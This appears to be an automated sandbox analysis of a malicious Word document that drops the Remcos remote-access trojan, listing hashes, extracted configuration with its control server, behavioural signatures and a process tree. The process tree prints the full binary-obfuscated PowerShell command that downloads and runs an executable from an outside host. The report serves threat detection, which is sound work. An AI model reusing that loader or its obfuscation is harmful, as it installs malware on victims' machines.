Analysis
- max time kernel: 299s
- max time network: 298s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 15-07-2021 20:14

Static task: static1
Behavioral task: behavioral1
  Sample: Payment Advice.doc
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: Payment Advice.doc
  Resource: win10v20210410

General
- Target: Payment Advice.doc
- Size: 217KB
- MD5: a1bb900ae8003b924f333442c4117a84
- SHA1: 126cd9e2de926ade2cdb20fb8d2a059b7786fde6
- SHA256: 9c5912424f920b71a98b0ac032cb3e74ca830dd0c9e9e2d406f4b9ff1f53af80
- SHA512: c7dbbc07793a59b038f5376b345aeb9c967f339b36e9242043207a66bc27a6b3046f7d143a61d48ae4ef9423efcff6919d30cfb86e736f16aa74dcf81c812f5e
Malware Config
Extracted
remcos
JULBUILD
saptransmissions.dvrlists.com:6969
- audio_folder: MicRecords
- audio_path: %AppData%
- audio_record_time: 5
- connect_delay: 0
- connect_interval: 1
- copy_file: remcos.exe
- copy_folder: Remcos
- delete_file: false
- hide_file: false
- hide_keylog_file: false
- install_flag: false
- install_path: %AppData%
- keylog_crypt: false
- keylog_file: logs.dat
- keylog_flag: false
- keylog_folder: JULBUILD
- keylog_path: %AppData%
- mouse_option: false
- mutex: JULBUILD-7DBACB
- screenshot_crypt: false
- screenshot_flag: false
- screenshot_folder: Screenshots
- screenshot_path: %AppData%
- screenshot_time: 10
- startup_value: Remcos
- take_screenshot_option: false
- take_screenshot_time: 5
- take_screenshot_title: wikipedia;solitaire;
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 404 | 3256 | powershell.exe | WINWORD.EXE
-
Blocklisted process makes network request 4 IoCs
Processes:
  flow | pid | process
  30 | 404 | powershell.exe
  35 | 2496 | mshta.exe
  39 | 2496 | mshta.exe
  40 | 2496 | mshta.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
  pid | process
  4036 | winint.exe
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kajscxo = "C:\\Users\\Public\\Libraries\\oxcsjaK.url" | winint.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
  pid | process
  3256 | WINWORD.EXE
  3256 | WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
  pid | process
  404 | powershell.exe
  404 | powershell.exe
  404 | powershell.exe
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
  pid | process
  2496 | mshta.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 404 | powershell.exe
-
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
  pid | process
  3256 | WINWORD.EXE
  3256 | WINWORD.EXE
  3256 | WINWORD.EXE
  3256 | WINWORD.EXE
  3256 | WINWORD.EXE
  3256 | WINWORD.EXE
  3256 | WINWORD.EXE
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
  description | pid | process | target process
  PID 3256 wrote to memory of 404 | 3256 | WINWORD.EXE | powershell.exe
  PID 3256 wrote to memory of 404 | 3256 | WINWORD.EXE | powershell.exe
  PID 404 wrote to memory of 4036 | 404 | powershell.exe | winint.exe
  PID 404 wrote to memory of 4036 | 404 | powershell.exe | winint.exe
  PID 404 wrote to memory of 4036 | 404 | powershell.exe | winint.exe
  PID 4036 wrote to memory of 2496 | 4036 | winint.exe | mshta.exe
  PID 4036 wrote to memory of 2496 | 4036 | winint.exe | mshta.exe
  PID 4036 wrote to memory of 2496 | 4036 | winint.exe | mshta.exe
  PID 4036 wrote to memory of 2496 | 4036 | winint.exe | mshta.exe
  PID 4036 wrote to memory of 2496 | 4036 | winint.exe | mshta.exe
  PID 4036 wrote to memory of 2496 | 4036 | winint.exe | mshta.exe
  PID 4036 wrote to memory of 2496 | 4036 | winint.exe | mshta.exe
  PID 4036 wrote to memory of 2496 | 4036 | winint.exe | mshta.exe
  PID 4036 wrote to memory of 2496 | 4036 | winint.exe | mshta.exe
  PID 4036 wrote to memory of 2496 | 4036 | winint.exe | mshta.exe
  PID 4036 wrote to memory of 2496 | 4036 | winint.exe | mshta.exe
  PID 4036 wrote to memory of 2496 | 4036 | winint.exe | mshta.exe
  PID 4036 wrote to memory of 2496 | 4036 | winint.exe | mshta.exe
  PID 4036 wrote to memory of 2496 | 4036 | winint.exe | mshta.exe
  PID 4036 wrote to memory of 2496 | 4036 | winint.exe | mshta.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (level 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payment Advice.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,01110011,00111010,00101111,00101111,01100011,01100100,01101110,00101110,01100100,01101001,01110011,01100011,01101111,01110010,01100100,01100001,01110000,01110000,00101110,01100011,01101111,01101101,00101111,01100001,01110100,01110100,01100001,01100011,01101000,01101101,01100101,01101110,01110100,01110011,00101111,00111000,00110101,00110110,00111001,00110010,00110101,00111001,00110101,00110010,00110000,00110000,00110100,00110000,00110110,00110011,00110010,00110100,00110010,00101111,00111000,00110110,00110101,00110010,00110111,00110100,00110010,00110000,00110010,00110011,00110111,00111000,00110110,00110000,00110000,00110100,00110100,00111001,00101111,01010011,01100101,01100011,01110101,01110010,01100101,01000101,01000110,01010100,01001110,01101111,01110100,01101001,01100011,01100101,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01110111,01101001,01101110,01101001,01101110,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,01001001,01000101,01011000,00100000,00101000,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01110111,01101001,01101110,01101001,01101110,01110100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\winint.exe (level 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\winint.exe"
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\mshta.exe (level 4)
        Command line: C:\Windows\System32\mshta.exe
        - Blocklisted process makes network request
        - Suspicious behavior: GetForegroundWindowSpam
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\winint.exe
  MD5: 36f250cb265a9ea1e50697c0def52aa8
  SHA1: ab1b5c8c68b77b4ab53cfed9ee5f2c192a29f5a3
  SHA256: eb92966bcd8187376efd77e3ce4d830b8ae81de436f23a604c218beac3554514
  SHA512: ef70fa852f3a4abc6bae263fb423be14e246739814471d7ddbcc588e30f5345910490a49f2a396e4da24c70427d103934a4502e7dea9dec9dc370d8315bc9c56
- C:\Users\Admin\AppData\Local\Temp\winint.exe
  MD5: 36f250cb265a9ea1e50697c0def52aa8
  SHA1: ab1b5c8c68b77b4ab53cfed9ee5f2c192a29f5a3
  SHA256: eb92966bcd8187376efd77e3ce4d830b8ae81de436f23a604c218beac3554514
  SHA512: ef70fa852f3a4abc6bae263fb423be14e246739814471d7ddbcc588e30f5345910490a49f2a396e4da24c70427d103934a4502e7dea9dec9dc370d8315bc9c56
- memory/404-266-0x0000000000000000-mapping.dmp
- memory/404-289-0x000001A77F8E6000-0x000001A77F8E8000-memory.dmp (Filesize: 8KB)
- memory/404-288-0x000001A77F8E3000-0x000001A77F8E5000-memory.dmp (Filesize: 8KB)
- memory/404-287-0x000001A77F8E0000-0x000001A77F8E2000-memory.dmp (Filesize: 8KB)
- memory/404-282-0x000001A77FAF0000-0x000001A77FAF1000-memory.dmp (Filesize: 4KB)
- memory/404-278-0x000001A77F4A0000-0x000001A77F4A1000-memory.dmp (Filesize: 4KB)
- memory/2496-318-0x0000000000970000-0x00000000009EA000-memory.dmp (Filesize: 488KB)
- memory/2496-314-0x0000000000000000-mapping.dmp
- memory/2496-316-0x0000000000920000-0x0000000000921000-memory.dmp (Filesize: 4KB)
- memory/2496-315-0x00000000008F0000-0x00000000008F1000-memory.dmp (Filesize: 4KB)
- memory/2496-317-0x0000000010590000-0x000000001060D000-memory.dmp (Filesize: 500KB)
- memory/2496-319-0x0000000000770000-0x0000000000771000-memory.dmp (Filesize: 4KB)
- memory/3256-122-0x00007FFCD56E0000-0x00007FFCD67CE000-memory.dmp (Filesize: 16.9MB)
- memory/3256-123-0x00007FFCD37E0000-0x00007FFCD56D5000-memory.dmp (Filesize: 31.0MB)
- memory/3256-114-0x00007FFCBABC0000-0x00007FFCBABD0000-memory.dmp (Filesize: 64KB)
- memory/3256-118-0x00007FFCDC8B0000-0x00007FFCDF3D3000-memory.dmp (Filesize: 43.1MB)
- memory/3256-119-0x00007FFCBABC0000-0x00007FFCBABD0000-memory.dmp (Filesize: 64KB)
- memory/3256-117-0x00007FFCBABC0000-0x00007FFCBABD0000-memory.dmp (Filesize: 64KB)
- memory/3256-116-0x00007FFCBABC0000-0x00007FFCBABD0000-memory.dmp (Filesize: 64KB)
- memory/3256-115-0x00007FFCBABC0000-0x00007FFCBABD0000-memory.dmp (Filesize: 64KB)
- memory/4036-304-0x0000000000000000-mapping.dmp
- memory/4036-308-0x0000000000760000-0x0000000000761000-memory.dmp (Filesize: 4KB)
- memory/4036-311-0x0000000005790000-0x00000000057AA000-memory.dmp (Filesize: 104KB)